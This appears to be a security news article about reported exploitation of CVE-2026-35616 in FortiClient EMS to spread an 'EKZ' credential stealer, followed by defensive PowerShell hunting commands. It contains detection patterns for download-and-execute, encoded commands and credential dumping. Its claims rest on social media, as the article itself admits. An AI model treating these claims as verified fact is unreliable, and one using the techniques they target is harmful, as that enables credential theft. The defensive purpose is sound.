Fortinet FortiClient EMS Under Fire as Hackers Exploit CVE-2026-35616 to Deploy EKZ Credential Stealer + Video

The cybersecurity landscape is once again facing turbulence after threat actors reportedly began exploiting a newly identified vulnerability in Fortinet’s FortiClient EMS platform. According to reports circulating across the security community, attackers are abusing CVE-2026-35616 to deploy the EKZ credential stealer through manipulated VPN scripting workflows, unauthenticated API access, and malicious PowerShell execution.

The attack chain appears particularly dangerous because it targets endpoint environments that organizations trust for secure remote connectivity. FortiClient EMS, widely used for centralized endpoint management and VPN deployment, becomes a high-value target when misconfigured or left unpatched. Threat actors understand this perfectly, and the latest campaign demonstrates how quickly operational tools can be transformed into entry points for credential theft and lateral movement.

Security researchers monitoring the campaign claim the exploit enables attackers to bypass authentication mechanisms and execute malicious payloads remotely. Once access is achieved, the EKZ malware reportedly steals sensitive endpoint data, harvested credentials, and potentially VPN session details that can later be used for broader enterprise compromise.

The vulnerability is attracting attention because of the attack methodology itself. Instead of relying solely on phishing emails or traditional malware droppers, the attackers allegedly weaponize legitimate administrative workflows inside FortiClient EMS. This allows malicious PowerShell scripts to blend into normal operational traffic, making detection significantly harder for security teams.

Another alarming detail is the abuse of API functionality. APIs are often overlooked during security audits, yet they remain one of the fastest-growing attack surfaces in enterprise environments. If unauthenticated API access is indeed involved in this campaign, organizations running exposed EMS instances could unknowingly provide attackers with direct access into internal management infrastructure.

The EKZ credential stealer is reportedly designed to extract browser credentials, VPN-related authentication tokens, session cookies, and potentially stored enterprise secrets from infected systems. In modern cyberattacks, stolen credentials often become more valuable than ransomware deployment itself because they allow silent persistence inside corporate networks.

Analysts believe the campaign reflects a broader trend where attackers increasingly combine endpoint management exploitation with stealthy credential harvesting. Instead of immediately encrypting systems or causing visible disruption, threat actors now prioritize long-term access and data monetization.

Fortinet products have historically been attractive targets due to their widespread adoption across enterprise and government environments. Whenever a new Fortinet vulnerability emerges, cybercriminal groups rapidly scan the internet for exposed systems before organizations have time to patch.

The malicious PowerShell activity referenced in the reports further highlights the continued abuse of legitimate Windows administration tools. PowerShell remains one of the most commonly weaponized utilities in modern intrusions because it allows attackers to execute scripts directly in memory while avoiding traditional malware signatures.

If confirmed at scale, this attack could impact organizations that rely heavily on remote workforce connectivity. VPN infrastructure remains mission-critical for many businesses, and any compromise involving VPN management platforms can quickly evolve into a large-scale security incident.

Several cybersecurity observers have warned that the attack chain could enable credential replay attacks, privilege escalation, and deeper access into enterprise Active Directory environments. Once attackers gain administrative credentials, the damage potential increases dramatically.

Organizations using FortiClient EMS are advised to monitor logs carefully for suspicious API requests, unexpected PowerShell executions, unauthorized script deployments, and anomalous VPN management behavior. Endpoint detection tools should also be configured to flag unusual credential access patterns.

The incident also serves as another reminder that endpoint management systems require the same level of security scrutiny as internet-facing applications. Many organizations focus heavily on firewall protection while underestimating risks associated with centralized management platforms.

Threat intelligence discussions on social media indicate that exploitation activity may already be active in the wild, meaning organizations delaying updates could face elevated risk exposure in the coming days.

What Undercode Says:

The Real Problem Is Trust Abuse

The most dangerous aspect of this campaign is not the vulnerability itself. It is the abuse of trusted enterprise infrastructure. Attackers no longer need noisy malware binaries when they can hijack legitimate administrative frameworks already approved inside corporate networks.

Endpoint Management Is Becoming the New Battlefield

Over the past two years, cybercriminals shifted focus toward management systems such as RMM tools, VPN controllers, patch management servers, and endpoint orchestration platforms. These systems already possess elevated privileges, making them ideal attack vectors.

PowerShell Continues to Dominate Modern Intrusions

PowerShell remains everywhere in enterprise environments because administrators depend on it daily. That same ubiquity makes it perfect for attackers. Security teams often struggle to distinguish legitimate automation from malicious execution chains.

APIs Are the Weakest Link in Many Enterprise Products

Many organizations secure login portals while ignoring backend APIs. Attackers understand that APIs frequently expose functionality developers never expected outsiders to access directly. Unauthenticated API flaws are especially catastrophic because they eliminate the need for credential theft during the initial intrusion stage.

Credential Theft Has Become More Valuable Than Ransomware

Years ago, attackers rushed to deploy ransomware immediately after gaining access. Today, stealth matters more. Stolen credentials can be sold, reused, or leveraged for persistent access over months without triggering major alarms.

Fortinet Remains a High-Value Target

Fortinet infrastructure exists in thousands of enterprise environments globally. Every critical Fortinet vulnerability quickly becomes attractive to both financially motivated gangs and advanced persistent threat groups.

Attackers Prefer Living-Off-the-Land Techniques

The reported abuse of scripting workflows aligns perfectly with the “living-off-the-land” strategy. Instead of introducing obvious malware files, attackers leverage native tools already trusted by the operating system.

VPN Ecosystems Are Under Continuous Pressure

Remote work permanently expanded the enterprise attack surface. VPN management systems became mission-critical overnight, but many organizations deployed them rapidly without fully hardening their environments.

Security Teams Must Watch Behavior, Not Just Malware

Traditional antivirus solutions alone cannot reliably detect attacks abusing legitimate tools. Behavioral monitoring, PowerShell logging, API inspection, and privilege anomaly detection are now essential defensive layers.

Deep analysis :

Detect suspicious PowerShell execution logs
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
Where-Object {$_.Message -match "Invoke-Expression|DownloadString|EncodedCommand"}

Monitor suspicious FortiClient EMS processes
Get-Process | Where-Object {$_.ProcessName -match "Forti|EMS"}

Search for abnormal outbound connections
netstat -ano | findstr ESTABLISHED

Detect newly created admin accounts
Get-LocalUser | Where-Object {$_.Enabled -eq $true}

PowerShell logging enforcement
Set-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging `
-Name EnableScriptBlockLogging -Value 1

Hunt for credential dumping activity
Get-WinEvent -LogName Security |
Where-Object {$_.Message -match "lsass|credential"}

Identify suspicious scheduled tasks
schtasks /query /fo LIST /v

Search EMS logs for unauthorized API requests
Select-String -Path "C:\Program Files\FortinetMS\logs.log" `
-Pattern "api|unauthorized|403|401"

Detect encoded PowerShell commands
Get-WmiObject Win32_Process |
Where-Object {$_.CommandLine -match "EncodedCommand"}

Network scanning indicators
Get-NetTCPConnection | Group-Object RemoteAddress
Why This Matters Beyond One Vulnerability

The broader issue extends beyond CVE-2026-35616 itself. Enterprise environments increasingly depend on centralized orchestration platforms. Once attackers compromise those systems, they gain the ability to distribute malicious payloads at scale across entire fleets of managed devices.

The Rise of Silent Intrusions

Cybercriminal operations are becoming quieter and more patient. Instead of triggering immediate disruption, they prioritize persistence, credential collection, and intelligence gathering before monetizing access later.

API Security Will Define Future Enterprise Defense

API security is no longer optional. Organizations must treat APIs as first-class attack surfaces requiring authentication, rate limiting, segmentation, and continuous monitoring.

Detection Engineering Must Evolve

Modern attacks bypass many signature-based tools entirely. Detection engineering teams now need to focus on behavioral telemetry, script execution analytics, abnormal parent-child process chains, and suspicious administrative actions.

Why Endpoint Visibility Matters

Organizations lacking endpoint visibility may never realize credentials were stolen until secondary attacks emerge weeks later. By then, attackers may already possess VPN access, email credentials, and privileged tokens.

Threat Actors Are Exploiting Operational Complexity

Large enterprises often run hybrid infrastructures with multiple authentication layers, VPN systems, and management consoles. Complexity itself becomes a vulnerability because defenders struggle to maintain consistent monitoring everywhere.

Security Hygiene Still Wins

Despite sophisticated exploitation chains, many breaches remain preventable through rapid patching, segmented management interfaces, restricted PowerShell execution, and zero-trust authentication policies.

🔍 Fact Checker Results

✅ FortiClient EMS has previously been targeted in real-world enterprise attacks due to its privileged role in network management.

✅ PowerShell abuse remains one of the most common techniques used in post-exploitation activity across Windows environments.

❌ There is currently limited publicly verified technical disclosure about the full scope of CVE-2026-35616 exploitation, meaning some circulating social media claims may still require independent confirmation.

📊 Prediction

🔮 Threat actors will increasingly target endpoint management ecosystems instead of traditional endpoints because centralized tools offer faster access to entire enterprise environments.

🔮 Security vendors will likely accelerate API hardening and privileged workflow protections following growing abuse of orchestration platforms.

🔮 Credential-stealing malware families like EKZ may evolve into modular espionage frameworks capable of persistence, lateral movement, and cloud authentication theft.

▶️ Related Video (80% Match):

🕵️‍📝Let’s dive deep and fact‑check.

References:

Reported By: x.com
Extra Source Hub (Possible Sources for article):
https://www.instagram.com
Wikipedia
OpenAi & Undercode AI

Image Source:

Unsplash
Undercode AI DI v2
Bing

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeNews & Stay Tuned:

Listen to this Post